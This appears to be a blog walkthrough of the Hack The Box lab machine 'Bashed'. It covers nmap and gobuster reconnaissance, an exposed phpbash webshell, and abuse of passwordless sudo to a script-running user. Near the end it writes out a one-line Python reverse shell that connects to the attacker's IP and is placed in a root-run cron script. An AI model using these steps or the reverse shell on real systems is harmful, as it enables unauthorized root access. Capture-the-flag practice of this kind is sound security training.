Hack the Box: Bashed

I ran NMAP.

Nmap 7.25BETA2 scan initiated Sat Feb 10 10:05:35 2018 as: nmap -vv -Pn -sS -A -sC -p- -T 3 -script-args=unsafe=1 -oA detailed_scan -n 10.10.10.68

Increasing send delay for 10.10.10.68 from 0 to 5 due to 379 out of 1262 dropped probes since last increase.
Nmap scan report for 10.10.10.68
Host is up, received user-set (0.26s latency).
Scanned at 2018-02-10 10:05:37 EST for 1856s
Not shown: 65485 closed ports
Reason: 65485 resets
PORT      STATE    SERVICE REASON                              VERSION
80/tcp    open     http    syn-ack ttl 63                      Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
7515/tcp  filtered unknown no-response
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.25BETA2%E=4%D=2/10%OT=80%CT=1%CU=40317%PV=Y%DS=2%DC=T%G=Y%TM=5A
OS:7F1181%P=i686-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)SEQ(S
OS:P=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%II
OS:=I%TS=8)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%TS=8)OPS(O1=M508ST11NW7%O2=M508ST1
OS:1NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=71
OS:20%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5
OS:08NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.007 days (since Sat Feb 10 10:26:33 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   257.82 ms 10.10.14.1
2   259.11 ms 10.10.10.68


Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Feb 10 10:36:33 2018 -- 1 IP address (1 host up) scanned in 1859.43 seconds

I checked port 80 then ran dirbuster.

root@kali:~/Desktop/HTB/bashed# gobuster -u http://10.10.10.68/ \
> -w /usr/share/seclists/Discovery/Web_Content/common.txt \
> -s '200,204,301,302,307,403,500' -e

Gobuster v1.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.68/
[+] Threads : 10
[+] Wordlist : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 200,204,301,302,307,403,500
[+] Expanded : true
=====================================================
http://10.10.10.68/.hta (Status: 403)
http://10.10.10.68/.htpasswd (Status: 403)
http://10.10.10.68/.htaccess (Status: 403)
http://10.10.10.68/css (Status: 301)
http://10.10.10.68/dev (Status: 301)
http://10.10.10.68/fonts (Status: 301)

Under http://10.10.10.68/dev I found phpbash.php a semi-interactive webshell  (https://github.com/Arrexel/phpbash).

I checked the filesystem and found a folder /scripts  owned by scriptmanager

www-data@bashed
:/# ls -lah

total 88K
drwxr-xr-x 23 root root 4.0K Dec 4 13:02 .
drwxr-xr-x 23 root root 4.0K Dec 4 13:02 ..
drwxr-xr-x 2 root root 4.0K Dec 4 11:22 bin
drwxr-xr-x 3 root root 4.0K Dec 4 11:17 boot
drwxr-xr-x 19 root root 4.2K Apr 28 09:52 dev
drwxr-xr-x 89 root root 4.0K Dec 4 17:09 etc
drwxr-xr-x 4 root root 4.0K Dec 4 13:53 home
lrwxrwxrwx 1 root root 32 Dec 4 11:14 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4.0K Dec 4 11:16 lib
drwxr-xr-x 2 root root 4.0K Dec 4 11:13 lib64
drwx------ 2 root root 16K Dec 4 11:13 lost+found
drwxr-xr-x 4 root root 4.0K Dec 4 11:13 media
drwxr-xr-x 2 root root 4.0K Feb 15 2017 mnt
drwxr-xr-x 2 root root 4.0K Dec 4 11:18 opt
dr-xr-xr-x 117 root root 0 Apr 28 09:52 proc
drwx------ 3 root root 4.0K Dec 4 13:03 root
drwxr-xr-x 18 root root 500 Apr 28 09:53 run
drwxr-xr-x 2 root root 4.0K Dec 4 11:18 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4.0K Dec 4 18:06 scripts
drwxr-xr-x 2 root root 4.0K Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Apr 28 09:53 sys
drwxrwxrwt 10 root root 4.0K Apr 28 09:53 tmp
drwxr-xr-x 10 root root 4.0K Dec 4 11:13 usr
drwxr-xr-x 12 root root 4.0K Dec 4 11:20 var
lrwxrwxrwx 1 root root 29 Dec 4 11:14 vmlinuz -> boot/vmlinuz-4.4.0-62-generic

I ran sudo -l and found out that I can run command as user scriptmanager without a password.

sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

Using sudo -u I was able to change the permission of the /scripts directory.

I found two files under /scripts directory test.py and test.txt.

www-data@bashed:/scripts# ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Feb 10 20:09 test.py
-rw-r--r-- 1 root root 12 Feb 10 20:43 test.txt

test.py

f = open("test.txt", "w")
f.write("testing 123!")
f.close

test.txt

testing 123!

I noticed in the timestamp of test.txt it updates in every ≤ 5 minutes and root owns it.

I changed the permission of the test.py so I can modify the code to python reverse shell.

sudo -u scriptmanager chmod 777 /scripts/test.py

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.15',1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);" > test.py

After waiting for a few minutes I got root.

 

Leave a Reply

Your email address will not be published. Required fields are marked *

Check this * Time limit is exhausted. Please reload the CAPTCHA.